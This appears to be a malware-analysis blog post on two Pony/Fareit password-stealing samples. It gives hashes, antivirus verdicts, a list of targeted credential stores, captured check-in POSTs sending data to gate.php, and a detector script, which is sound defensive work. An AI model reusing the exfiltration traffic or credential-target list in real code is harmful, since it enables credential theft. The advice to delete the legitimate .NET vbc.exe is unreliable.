Malware analysis

looking for the perfect virus

Tag: pony

Pony.exe

Apr 12

File: Pony.exe
CRC-32: 7bbafba6
MD4: 1665b859e0c0c22dc4691aa61b3f69d4
MD5: 3c26a27f3937e274542a40ba04a76493
SHA-1: 256d1c7c4b8127bde01eb66bdc1439b89fa137e3
Size: 35.5 KB (36,352 bytes)

antivirus detection:
Started at: 18:47 12.04.2013 Finished at: 18:48 12.04.2013, chk4me.com
arcavir WIR: Heur.RoundKick
avast Win32:Agent-AOOD [Trj]
avg Trojan horse PSW.Generic10.BAHN
avira Is the TR/PSW.Fareit.488 Trojan
bitdefender Gen:Variant.Graftor.31587
clamav PUA.Win32.Packer.Upx-53 FOUND
comodo Malware@#3fxw8ofzoj9ty
drweb infected with Trojan.PWS.Stealer.1997
emsisoft Gen:Variant.Graftor.31587 (B)
nod32 a variant of Win32/PSW.Fareit.A trojan
fprot Ok
fsecure Gen:Variant.Graftor.31587
ikarus Trojan-PWS.Win32.Fareit
kaspersky HEUR:Trojan.Win32.Generic
mcafee Found the Generic PWS.y!1wx trojan !!!
microsoft PWS:Win32/Fareit
norman win32:winpe/Fareit.T
panda Trj/Genetic.gen
quickheal Detected: “TrojanPWS.Fareit”
sophos Ok
symantec Downloader.Ponik
etrust Ok
trendmicro Ok
virusbuster trojan found: Trojan.PWS.Fareit!kSA0qeeHvYc

process:
Pony.exe

network activity:
POST /enter.exe/gate.php HTTP/1.0
Host: track***invites.net
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 6168
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

memory strings:

UPX0
`UPX1
`.rsrc
UPX!
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
Software\Ghisler\Windows Commander
Software\Ghisler\Total Commander
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
Software\FileZilla
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\TurboFTP 
Software\Sota\FFFTP 
Software\Sota\FFFTP\Options
Software\CoffeeCup Software\Internet\Profiles
Software\FTPWare\COREFTP\Sites
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224 
Software\FTP Explorer\Profiles
Software\VanDyke\SecureFX
Software\NCH Software\ClassicFTP\FTPAccounts
SOFTWARE\NCH Software\Fling\Accounts
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
\LeapWare\LeapFTP
Software\South River Technologies\WebDrive\Connections
Software\Opera Software
wiseftpsrvs.ini
wiseftp.ini
FTPVoyager.ftp
\Mozilla\Firefox\
Software\Mozilla
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
\Google\Chrome
\Chromium
\ChromePlus
Software\ChromePlus
SOFTWARE\Robo-FTP 3.7\Scripts
SOFTWARE\Robo-FTP 3.7\FTPServers
Software\LinasFTP\Site Manager
Software\SimonTatham\PuTTY\Sessions
Software\CoffeeCup Software
Software\MAS-Soft\FTPInfo\Setup
\Microsoft\Windows Live Mail
Software\IncrediMail
Software\RIT\The Bat!\Users depot
Software\Microsoft\Internet Account Manager\Accounts
Identities
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Internet Account Manager
inetcomm server passwords
outlook account manager passwords

malware type: pony, info-stealer

removal:
kill process: pony.exe
change all passwords

File: Metin 2 Bob Hack v2.0.exe
CRC-32: b2ba18f8
MD4: d08f63f1993f321dc120253fbdb816a5
MD5: 0cb8796532de41f04e2c4c6c1f36c218
SHA-1: ed646ea700ffa4e404381a752f2166c273c2b042
Size: 474 KB (485,376 bytes)

Comments "Marion"
CompanyName "Marion"
FileDescription "Marion"
FileVersion "8.2.4.7"
InternalName "Marion.exe"
LegalCopyright "Copyright © Marion 2013"
OriginalFilename "Marion.exe"
ProductName "Marion"
ProductVersion "8.2.4.7"
Assembly Version "8.2.4.7"

antivirus detection:
Started at: 22:02 16.01.2013 Finished at: 22:03 16.01.2013, chk4me.com
arcavir Ok
avast Win32:Malware-gen
avg Trojan horse BackDoor.Generic16.AEEU
avira Is the TR/PSW.Fareit.219 Trojan
bitdefender Backdoor.Generic.759869
clamav Ok
comodo TrojWare.MSIL.Injector.AVW@290738089
drweb infected with BackDoor.Tordev.8
emsisoft Backdoor.Generic.759869 (B)
nod32 a variant of MSIL/Injector.AWU trojan
fprot Ok
fsecure Backdoor.Generic.759869
ikarus Backdoor.Win32.Fynloski
kaspersky Trojan.Win32.Genome.ajpvn
mcafee Ok
microsoft PWS:Win32/Fareit
norman winpe/Troj_Generic.GMVNZ
panda Ok
quickheal Ok
sophos Ok
symantec Ok
etrust Ok
trendmicro Ok
vipre Trojan.Win32.Generic!BT
vba32 Ok
virusbuster trojan found: Trojan.Genome!WcZb6MGy83o

process:
vbc.exe (C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\vbc.exe)

network activity:

POST /gate.php HTTP/1.0
Host: pon***.comlu.com
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 5914
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
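Both captures on this page (the Pony.exe post above and this one) share the same check-in shape: a binary octet-stream POST to gate.php over HTTP/1.0 with an MSIE 5.0 / Windows 98 User-Agent. The detector below is an added example, not code from the original post; it parses a raw request and counts those traits, with the sample request constructed from the capture above (host masked as printed) and the hit threshold of 6 chosen here as an assumption.

```python
"""Flag HTTP requests carrying the Pony/Fareit check-in fingerprint.
Added example, not from the original post: traits come from the two requests
captured on this page; the sample below is constructed, host masked as printed."""

# Header values both captured check-ins share (names lowercased for lookup).
PONY_HEADERS = {
    "accept": "*/*",
    "accept-encoding": "identity, *;q=0",
    "connection": "close",
    "content-type": "application/octet-stream",
    "content-encoding": "binary",
    "user-agent": "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)",
}

# Constructed sample: the second capture on this page, body omitted.
PONY_SAMPLE = (
    "POST /gate.php HTTP/1.0\nHost: pon***.comlu.com\nAccept: */*\n"
    "Accept-Encoding: identity, *;q=0\nContent-Length: 5914\nConnection: close\n"
    "Content-Type: application/octet-stream\nContent-Encoding: binary\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\n"
)

def parse_request(raw: str) -> dict:
    """Split a raw request into method/path/version plus lowercased header names."""
    lines = raw.strip().splitlines()
    method, path, version = lines[0].split()
    fields = {"method": method, "path": path, "version": version}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        fields[name.strip().lower()] = value.strip()
    return fields

def pony_indicators(raw: str) -> list:
    """Names of the Pony check-in traits present in one request."""
    req = parse_request(raw)
    hits = []
    if req["method"] == "POST" and req["path"].lower().endswith("gate.php"):
        hits.append("post-to-gate.php")
    if req["version"] == "HTTP/1.0":
        hits.append("http/1.0")
    hits += [name for name, want in PONY_HEADERS.items() if req.get(name) == want]
    return hits

def is_pony_checkin(raw: str, min_hits: int = 6) -> bool:
    """gate.php alone is weak (many web panels use it); require most traits."""
    return len(pony_indicators(raw)) >= min_hits
```

Run it over proxy or IDS-reassembled requests; a hit list missing only the gate.php trait still flags the same binary stealer beacon under a renamed gate.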

delete file:
c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\vbc.exe

removal:
1. kill vbc.exe
2. delete Metin 2 Bob Hack v2.0.exe
3. change all passwords